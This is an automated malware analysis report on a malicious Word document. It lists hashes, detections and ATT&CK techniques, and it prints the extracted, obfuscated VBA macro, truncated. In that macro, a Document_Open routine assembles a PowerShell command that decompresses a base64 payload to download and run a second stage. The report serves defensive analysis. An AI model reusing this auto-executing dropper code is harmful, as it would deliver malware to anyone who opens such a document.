Office (OLE) malware analysis — malicious · 7e3ea7a1e6f1e70c

MALICIOUS

Office (OLE)

260.5 KB Created: 2018-07-09 22:45:00 Authoring application: Microsoft Office Word First seen: 2018-07-14

MD5: 4bcae2d004c688391216b3d7c56dbb43 SHA-1: a06cb0cdf65abf149658b7c4069911412acaa965 SHA-256: 7e3ea7a1e6f1e70cb6c2c85f4571fab88f27aec9677e0e1b1f070d617ef1ad3c

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The Document_Open macro triggers a Shell() call, which executes a PowerShell command. This command is designed to download and execute a second-stage payload from a remote URL, indicating a dropper functionality.

Heuristics 6

ClamAV: Doc.Dropper.Agent-6605641-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6605641-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18838 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	18838 bytes
SHA-256: `3e86b4701daade618c0120fa9639a2c2810e5a1863b8fb7afb623b3f9fbaa8c4`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "QdNinbYszdDwW" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next cIBoT = (hKacLF * kUiZX - IXaHV - TNnHBN + 43548 - NKJqF + (40498 + rOUEuA)) DrvWsO = (CAjCAh * DZPprI - KrTCiQ - FDbla + 67803 - PFqiwS + (15351 + KDUzz)) hPhjS = (JOXcpf * OdWUAj - LGmvA - XcPuPu + 72252 - TMmZfm + (76379 + hojTRZ)) psJHq = (dmidbh * cMvtBv - juUtX - ZwLhXw + 72965 - EXliz + (85991 + ArBLGk)) sPRfMvYlw ("" + EIkDsAcUJwlzz + ZwJnTYKsp + kiFAIwwZFUp + oQaASzhG + fdLDz + ZQdZTuXPkOBia + dvkYpJPB) iDTiQr = (XXIGU * uJAVt - rEapvi - zfliJ + 28950 - skrEjT + (44001 + HDtzIi)) pnVQL = (HOYAFs * lswrtU - SvpaO - zXwvZ + 54380 - Qwrnz + (30281 + ccjjO)) End Sub Attribute VB_Name = "WKuHPOjwtwvBB" Function kiFAIwwZFUp() On Error Resume Next dXksk = MUizc / NViBPB + JszrQi + SMqzq + KHpUi * uDjED frdsiC = 25407 + aadfU * 20432 * rzdkIP - GjNWr - vaowu / 70237 * KoTLu * 56519 / jjLpK * 26022 / 23516 * 23396 * aSoQIk IKGPzm = 64831 + jHXCjS * 80241 * NnZUYM - ujrNdF - uZroD / 69555 * ljudE * 51126 / oJCHd * 18242 / 4972 * 41489 * cHvjL RvkOnfzwVV = "p" + EfPNzLrPFI + iqUlYGZ + "owe" + AwRYOPh + MFbWZYK + "rsh" + wLsXBaSjlnJIE + TEjwpjvKH + "el" + WbIRvbjPbdMcuq + duzvHzIDVoMC + "l " + BlVFErX + ibpipGbpHjASP + "( " + oWTFvHOd + cbHpmOKJDO + "NeW" + VSwuzFTGk + OQhYSYkUzhG + "-o" + TzUUqIMunWB + BHJKBnrA + "b" + EqslSuVkPF + zkzQcYjatjX + "jEc" + cKnjSViabP + WtzRllvqaIYLkL + "T " + SiYTjOqki + jnAYUWTFijIHub + "I" + UlcvHCLIwrJOID + hpMDakEoQFom + "o.c" + drQSVwFIpj + bdMFzaQZaFPPV + "oM" + niBOYwaORzqh + YAjaiJacLIN + "P" vXcBwl = SdnSD + 86431 * OuIHt / uBFjon + GKTtAC / iqovt LuNNW = IMhDBU + 43970 * tStMJK / HKtRB + WYFMNz / jHrVRz YAzdPkHiY = "re" + PsjfZkYvjjl + kTwVLmn + "sSi" + nWYGmaYuMrPiu + WFlzKciLHfWY + "O" + ljGBYFJGTzzWoX + ZpSKwGAoROJ + "N.D" + aPCzzaKIc + bPloCnoGRfFhFO + "eF" + jSkJvwqshuX + kTzSWijUMldaCt + "LAT" + iwlzudpsNz + tGHQzJjMHP + "est" PLUhHi = FFWzwm + 82239 * GdFEW / JbFdM + tMXOTN / kjJIk XTWHJ = GGZjCK + 24035 * FjODvF / shIjkj + TzUUZ / hqEwU wFvmzodwKU = "R" + noLJBifzuFpa + mOaYzAncOhk + "E" + OfQiNiMFszXjC + DPfzICDqX + "AM" + VzKadYElQUiW + uZtRDpvaUYwCl + "([S" + KpsniNNuSTwfQ + ZtEHOcKZTGnvim + "ySt" + mQvFfliwijf + FKiQVzFwiZNAQY + "EM" + SiIqsMOVDTnKH + zjbOvJiJmWcI + "." + FPNBGMwWkFsw + CMvqArQQ + "io." + lhnZWUPE + wEaIBRiazVWzz + "M" + ZbmHzQoa + YYZAPpoZV + "E" + mmpjIqRSnlhWSw + zXXKdXsdsJZ + "m" + iaiDInowXqa + PiqCHEVM + "OR" + zDUPuMq + hmFLDSJIF + "YST" PwHjZz = 94174 / TTOmVS + (kKvtp / wBwuzH + 8293 / znaEi) jznWH = 26851 / qCVOTr + (hzoYu / jrJoUJ + 36976 / jzvQjQ) ROLjuN = 40918 / vhRQc + (GkXfK / wJlas + 85887 / Wjnin) sRllkiCzR = "re" + wkMubdACNh + PqCDYXTsHcl + "a" + rwUIzdh + JALkjnwGXsARG + "m]" + kJQPmLTwXsk + uOEKdXhBrno + "[CO" + BFsnkkTqXpNRLf + nrzIQMJ + "N" + niwdsVckpKOGk + LqWZrsSsqzEvoX + "v" + vEwzBUMfTkhVV + CjzwaqkwwUqHdo + "E" + MJVSBnKwqdqFG + XODBMpaFwLIwdK + "RT" + ruzULzJuOYBF + iqnWTtZmNwmDXG + "]:" hnitzK = 18320 / mXFJmn + (UIwjRK / rTJEh + 97821 / HbDBZq) LFDOLtSq = ":" + AUjzkvo + ZJRvZZbfbvLjud + "Fr" + iwBINwas + MkNVvftFHoQMCd + "Om" + PSQUFqWpGzmHmc + qbMqSFAfpp + "ba" + rRuYiThIck + OXPwsmTfFr + "S" + QjbJRkiQVAw + NZSubwF + "e6" Ozbuf = 68835 / tlGZaW + (FzIqNV / LIqVF + 74727 / ichsK) buqDnD = 42433 / QAvTHz + (YqrGbA / ZariN + 1161 / duQrZH) DJWhdFUD = "4S" + fjVibjGYnaNspR + tLCCpkZZwsPI + "tRi" + PRJLTbViujFj + ruQMtwwzCZFuHv + "NG" + RzzGKwjiwHOL + zFidiCbDP + "('" + POkFZTZBLSIk + vLmOljnijcAL + "V" + fHOhYYuh + YnoKFAoUns + "Z" + poiruhiIFNqMV + aLWqNMO + "Bd" + uddjnfYkZnSZDh + DqSKzboBz + "a8" + QCaiawjw + vUaoFni + "I" + XitdKWvfzSp + ZWIizJraWlMI + "wF" + sVsoFOSqiW + IfThdbcJv + "Ib/" + WnZvDAtjUCA + GijNTirl + "Si" ALGpHk = 62054 / aopWBj + (PplqE / IcKaz + 85172 / qMLuM) XSVsozrriEq = "8K" + wLlvoEZOTkdC + sGv ... (truncated)

SHA-256: 3e86b4701daade618c0120fa9639a2c2810e5a1863b8fb7afb623b3f9fbaa8c4

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "QdNinbYszdDwW"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
   cIBoT = (hKacLF * kUiZX - IXaHV - TNnHBN + 43548 - NKJqF + (40498 + rOUEuA))
   DrvWsO = (CAjCAh * DZPprI - KrTCiQ - FDbla + 67803 - PFqiwS + (15351 + KDUzz))
   hPhjS = (JOXcpf * OdWUAj - LGmvA - XcPuPu + 72252 - TMmZfm + (76379 + hojTRZ))
   psJHq = (dmidbh * cMvtBv - juUtX - ZwLhXw + 72965 - EXliz + (85991 + ArBLGk))
sPRfMvYlw ("" + EIkDsAcUJwlzz + ZwJnTYKsp + kiFAIwwZFUp + oQaASzhG + fdLDz + ZQdZTuXPkOBia + dvkYpJPB)
   iDTiQr = (XXIGU * uJAVt - rEapvi - zfliJ + 28950 - skrEjT + (44001 + HDtzIi))
   pnVQL = (HOYAFs * lswrtU - SvpaO - zXwvZ + 54380 - Qwrnz + (30281 + ccjjO))
End Sub


Attribute VB_Name = "WKuHPOjwtwvBB"
Function kiFAIwwZFUp()
On Error Resume Next
dXksk = MUizc / NViBPB + JszrQi + SMqzq + KHpUi * uDjED
   frdsiC = 25407 + aadfU * 20432 * rzdkIP - GjNWr - vaowu / 70237 * KoTLu * 56519 / jjLpK * 26022 / 23516 * 23396 * aSoQIk
   IKGPzm = 64831 + jHXCjS * 80241 * NnZUYM - ujrNdF - uZroD / 69555 * ljudE * 51126 / oJCHd * 18242 / 4972 * 41489 * cHvjL
RvkOnfzwVV = "p" + EfPNzLrPFI + iqUlYGZ + "owe" + AwRYOPh + MFbWZYK + "rsh" + wLsXBaSjlnJIE + TEjwpjvKH + "el" + WbIRvbjPbdMcuq + duzvHzIDVoMC + "l " + BlVFErX + ibpipGbpHjASP + "( " + oWTFvHOd + cbHpmOKJDO + "NeW" + VSwuzFTGk + OQhYSYkUzhG + "-o" + TzUUqIMunWB + BHJKBnrA + "b" + EqslSuVkPF + zkzQcYjatjX + "jEc" + cKnjSViabP + WtzRllvqaIYLkL + "T " + SiYTjOqki + jnAYUWTFijIHub + "I" + UlcvHCLIwrJOID + hpMDakEoQFom + "o.c" + drQSVwFIpj + bdMFzaQZaFPPV + "oM" + niBOYwaORzqh + YAjaiJacLIN + "P"
vXcBwl = SdnSD + 86431 * OuIHt / uBFjon + GKTtAC / iqovt
   LuNNW = IMhDBU + 43970 * tStMJK / HKtRB + WYFMNz / jHrVRz
YAzdPkHiY = "re" + PsjfZkYvjjl + kTwVLmn + "sSi" + nWYGmaYuMrPiu + WFlzKciLHfWY + "O" + ljGBYFJGTzzWoX + ZpSKwGAoROJ + "N.D" + aPCzzaKIc + bPloCnoGRfFhFO + "eF" + jSkJvwqshuX + kTzSWijUMldaCt + "LAT" + iwlzudpsNz + tGHQzJjMHP + "est"
PLUhHi = FFWzwm + 82239 * GdFEW / JbFdM + tMXOTN / kjJIk
   XTWHJ = GGZjCK + 24035 * FjODvF / shIjkj + TzUUZ / hqEwU
wFvmzodwKU = "R" + noLJBifzuFpa + mOaYzAncOhk + "E" + OfQiNiMFszXjC + DPfzICDqX + "AM" + VzKadYElQUiW + uZtRDpvaUYwCl + "([S" + KpsniNNuSTwfQ + ZtEHOcKZTGnvim + "ySt" + mQvFfliwijf + FKiQVzFwiZNAQY + "EM" + SiIqsMOVDTnKH + zjbOvJiJmWcI + "." + FPNBGMwWkFsw + CMvqArQQ + "io." + lhnZWUPE + wEaIBRiazVWzz + "M" + ZbmHzQoa + YYZAPpoZV + "E" + mmpjIqRSnlhWSw + zXXKdXsdsJZ + "m" + iaiDInowXqa + PiqCHEVM + "OR" + zDUPuMq + hmFLDSJIF + "YST"
PwHjZz = 94174 / TTOmVS + (kKvtp / wBwuzH + 8293 / znaEi)
   jznWH = 26851 / qCVOTr + (hzoYu / jrJoUJ + 36976 / jzvQjQ)
   ROLjuN = 40918 / vhRQc + (GkXfK / wJlas + 85887 / Wjnin)
sRllkiCzR = "re" + wkMubdACNh + PqCDYXTsHcl + "a" + rwUIzdh + JALkjnwGXsARG + "m]" + kJQPmLTwXsk + uOEKdXhBrno + "[CO" + BFsnkkTqXpNRLf + nrzIQMJ + "N" + niwdsVckpKOGk + LqWZrsSsqzEvoX + "v" + vEwzBUMfTkhVV + CjzwaqkwwUqHdo + "E" + MJVSBnKwqdqFG + XODBMpaFwLIwdK + "RT" + ruzULzJuOYBF + iqnWTtZmNwmDXG + "]:"
hnitzK = 18320 / mXFJmn + (UIwjRK / rTJEh + 97821 / HbDBZq)
LFDOLtSq = ":" + AUjzkvo + ZJRvZZbfbvLjud + "Fr" + iwBINwas + MkNVvftFHoQMCd + "Om" + PSQUFqWpGzmHmc + qbMqSFAfpp + "ba" + rRuYiThIck + OXPwsmTfFr + "S" + QjbJRkiQVAw + NZSubwF + "e6"
Ozbuf = 68835 / tlGZaW + (FzIqNV / LIqVF + 74727 / ichsK)
   buqDnD = 42433 / QAvTHz + (YqrGbA / ZariN + 1161 / duQrZH)
DJWhdFUD = "4S" + fjVibjGYnaNspR + tLCCpkZZwsPI + "tRi" + PRJLTbViujFj + ruQMtwwzCZFuHv + "NG" + RzzGKwjiwHOL + zFidiCbDP + "('" + POkFZTZBLSIk + vLmOljnijcAL + "V" + fHOhYYuh + YnoKFAoUns + "Z" + poiruhiIFNqMV + aLWqNMO + "Bd" + uddjnfYkZnSZDh + DqSKzboBz + "a8" + QCaiawjw + vUaoFni + "I" + XitdKWvfzSp + ZWIizJraWlMI + "wF" + sVsoFOSqiW + IfThdbcJv + "Ib/" + WnZvDAtjUCA + GijNTirl + "Si"
ALGpHk = 62054 / aopWBj + (PplqE / IcKaz + 85172 / qMLuM)
XSVsozrriEq = "8K" + wLlvoEZOTkdC + sGv
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.